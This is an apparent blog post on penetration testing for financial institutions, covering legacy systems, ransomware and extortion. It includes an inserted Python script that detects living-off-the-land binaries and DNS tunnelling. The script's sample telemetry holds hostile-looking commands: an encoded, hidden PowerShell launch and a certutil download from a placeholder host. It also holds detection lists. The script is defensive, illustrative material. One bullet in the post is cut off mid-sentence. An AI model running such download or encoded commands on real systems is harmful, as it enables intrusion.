Pen-Testing: Enduring Threats to Financial Sector
- December 17, 2020
- Hiba Sulaiman
While focusing on the needs and rights of customers, legislation in different countries underlines the importance of pen testing for banks and financial services companies. Currently, several firms are working relentlessly to restore networks that have been disrupted by cyber attacks. Banks and financial technology companies around the world have been reported as victims of ransomware and other cyber attacks. Cybercriminals have also attempted breaches that forced ATM transactions to be suspended overnight, and hackers have taken websites associated with a stock exchange offline using DDoS attacks. Such disruptions not only affect customer services but also damage customers' confidence in the financial services sector. As a preemptive measure, banks and financial companies consider pen testing a viable response to these cyber threats. Regulators are also taking notice of these threats, and operational resilience has shot to the top of agendas around the world since the outbreak of COVID-19. Thus, banks look for trusted pen testing companies to perform pen tests, vulnerability scanning and similar assessments to ensure they are cybersecurity-ready.
A lot has happened in a year, most notably the largest public health emergency of this century. Cyber threat actors have not stood still in this period; many groups have exploited the turbulence to target victims. The nature of these threats is such that they change little over time: the motivation of these threat actors exists outside of the cyber domain, and the internet is merely a means to achieve their ends. Their tools and techniques evolve, and this pattern of stable motives and changing methods is likely to remain a useful model in the coming years.
Financial services institutions, from central banks to retail banks, have all been struggling with legacy IT infrastructure for years. While this is true of most industries, the problem is severe in finance because of widespread reliance on core systems that are many decades old and have been stitched together through mergers and acquisitions. The financial industry mostly relies on software written in COBOL (Common Business-Oriented Language), and the number of qualified engineers who can maintain these codebases is decreasing each year. A recent report on IT failures in the financial services sector found that companies are not doing enough to mitigate the operational risks posed by legacy technology and that organizations should ensure they pen-test their legacy systems. Experts argue that legacy systems should move to cloud technology. However, this requires careful planning and is not as simple as it sounds. For instance, legacy login credentials quickly result in breaches if the systems are exposed to the internet. Organizations need to sort out such factors before migrating to the cloud.
What is Pen-Testing?
Penetration testing is also known as ethical or whitehat hacking: pen testers take a proactive testing approach to discover IT security issues. The main goal is to identify and secure them before malicious attackers can cause any sort of damage. It should not be confused with vulnerability scanning, which is an automated process that searches for all known vulnerabilities. Both types of test play a crucial role in a proper cyber hygiene strategy, and growing reliance on IT makes them a necessity. Mobile apps are now in common use, which greatly increases attacks on those devices and apps. Last year, cyber attacks caused 7 banks in the UK alone to shut down their operations. In these situations, banks are left with no option but to hire the right pen testing company.
Cyber attacks are continuously increasing, and the techniques these threat groups use to achieve their goals continue to evolve.
Some of the major threats to the financial system come from organized criminal groups seeking to steal funds. A growing trend among these actors has been their progression into deeper levels of financial infrastructure. Most of these groups use sophisticated and advanced pen testing tools with features that make detection on enterprise networks difficult. These features include:
- Living-off-the-land techniques
- In-memory infection – Where the malware do
- Domain name system (DNS)
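The features listed above are exactly what a blue team (or the pen test team reporting on detection gaps) looks for in endpoint and network telemetry. The Python script below is an added example, not code from the original post or from any vendor it mentions; it runs two simple detection heuristics over constructed records: a living-off-the-land check on process-creation events (a legitimate system binary launched from an Office parent or with download/encoded-command arguments) and a DNS check that flags domains whose subdomain labels look like encoded data. The LOLBin list, parent-process list, thresholds and every sample record are assumptions chosen for illustration, and the DNS part assumes that the list's "Domain name system (DNS)" item refers to DNS used as a covert channel, which the post does not spell out.

```python
"""Toy detection pass over constructed endpoint and DNS telemetry (added example)."""
import math
import re
from collections import Counter, defaultdict

# --- Living-off-the-land: legitimate, signed system binaries abused by intruders ---
# Hypothetical lists; a real deployment tunes these to the estate's baseline.
LOLBINS = {"powershell.exe", "certutil.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wmic.exe", "bitsadmin.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SUSPICIOUS_ARGS = re.compile(r"(-enc\b|-encodedcommand|-urlcache|https?://|downloadstring)", re.I)

# Constructed process-creation events, not real telemetry.
PROCESS_EVENTS = [
    {"parent": "outlook.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUJD"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe report.txt"},
    {"parent": "winword.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://files.example.invalid/a.dat a.dat"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell.exe Get-Date"},
]


def lolbin_findings(events):
    """Return (image, reason) pairs for LOLBin launches with a risky parent or arguments."""
    findings = []
    for ev in events:
        image = ev["image"].lower()
        if image not in LOLBINS:
            continue
        reasons = []
        if ev["parent"].lower() in OFFICE_PARENTS:
            reasons.append(f"spawned by {ev['parent']}")
        if SUSPICIOUS_ARGS.search(ev["cmdline"]):
            reasons.append("suspicious arguments")
        if reasons:  # a plain admin use of powershell.exe from cmd.exe is left alone
            findings.append((image, "; ".join(reasons)))
    return findings


# --- DNS: flag domains whose query pattern looks like data carried in subdomain labels ---
# Constructed query log; example-bank.invalid is benign, tunnel.invalid is the suspect.
DNS_QUERIES = [
    "www.example-bank.invalid", "mail.example-bank.invalid", "online.example-bank.invalid",
    "www.example-bank.invalid",
    "6b2f3c9e1d4a8f07b5e2c1d9a3f6e8b4.c2.tunnel.invalid",
    "0a1b2c3d4e5f60718293a4b5c6d7e8f9.c2.tunnel.invalid",
    "f1e2d3c4b5a6978877665544332211ff.c2.tunnel.invalid",
    "9c8b7a6f5e4d3c2b1a0f9e8d7c6b5a4e.c2.tunnel.invalid",
    "33cc55aa77ee99bb11dd44ff66882200.c2.tunnel.invalid",
]


def shannon_entropy(text):
    """Bits per character; encoded payloads score higher than human-chosen host names."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum((c / len(text)) * math.log2(c / len(text)) for c in counts.values())


def dns_findings(queries, max_label_len=30, max_entropy=3.5, max_unique_subdomains=20):
    """Group queries by the last two labels and report domains that trip any threshold."""
    per_domain = defaultdict(set)
    for q in queries:
        labels = q.lower().rstrip(".").split(".")
        if len(labels) < 3:
            continue  # nothing in front of the registered domain to inspect
        per_domain[".".join(labels[-2:])].add(".".join(labels[:-2]))
    findings = {}
    for domain, subs in per_domain.items():
        reasons = []
        first_labels = [s.split(".")[0] for s in subs]
        if max(len(lab) for lab in first_labels) > max_label_len:
            reasons.append("very long subdomain label")
        if max(shannon_entropy(lab) for lab in first_labels) > max_entropy:
            reasons.append("high-entropy subdomain label")
        if len(subs) > max_unique_subdomains:
            reasons.append(f"{len(subs)} distinct subdomains")
        if reasons:
            findings[domain] = reasons
    return findings


if __name__ == "__main__":
    for image, why in lolbin_findings(PROCESS_EVENTS):
        print(f"[process] {image}: {why}")
    for domain, why in dns_findings(DNS_QUERIES).items():
        print(f"[dns] {domain}: {', '.join(why)}")
```

Run as a script it reports the two LOLBin launches (PowerShell from Outlook with an encoded command, certutil from Word fetching a URL) and the tunnel.invalid domain, while leaving the ordinary PowerShell and bank host names alone. The thresholds are deliberately loose starting points: in production the label length, entropy and per-domain subdomain counts should be set against a baseline of the organization's own traffic, since CDNs and some SaaS providers legitimately generate long, high-entropy host names.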
Ransom and Extortion
Over the years, ransomware has evolved from phishing attacks via email to attacks against large organizations and institutions, causing huge damage on a regular basis. While their tactics change, criminal groups now steal data from company networks prior to encryption and threaten to release that critical data publicly if the victims do not pay the ransom.
One of the most common target sectors for such attacks is industrial and manufacturing companies. However, financial services have also been targeted recently. In 2020, the new data-leaking tactic that criminals are using increased the pressure on victims to pay, since otherwise sensitive customer information will be released. This can be far more damaging than a traditional encryption attack, where the costs (if no ransom is paid) are limited to remediation. The publicity such attacks generate can do great damage to an organization's reputation. They also use a different type of ransom attack, in which DDoS techniques rather than ransomware are used against an organization.
Testing Techniques to Improve Cyber Resilience
Regulators have been raising their concerns about cybersecurity risks to the financial services sector, and operational resilience has been at the top of the agenda for financial services regulators. The financial sector relies heavily on trust, and its services are designed to be resilient in order to gain a competitive edge. If organizations do not seek pen testing services, disruptions to their services may cause significant harm to the financial market. Thus, to address cyber resilience and help firms identify vulnerabilities that attackers could exploit to impact essential business services, they hire a penetration testing company.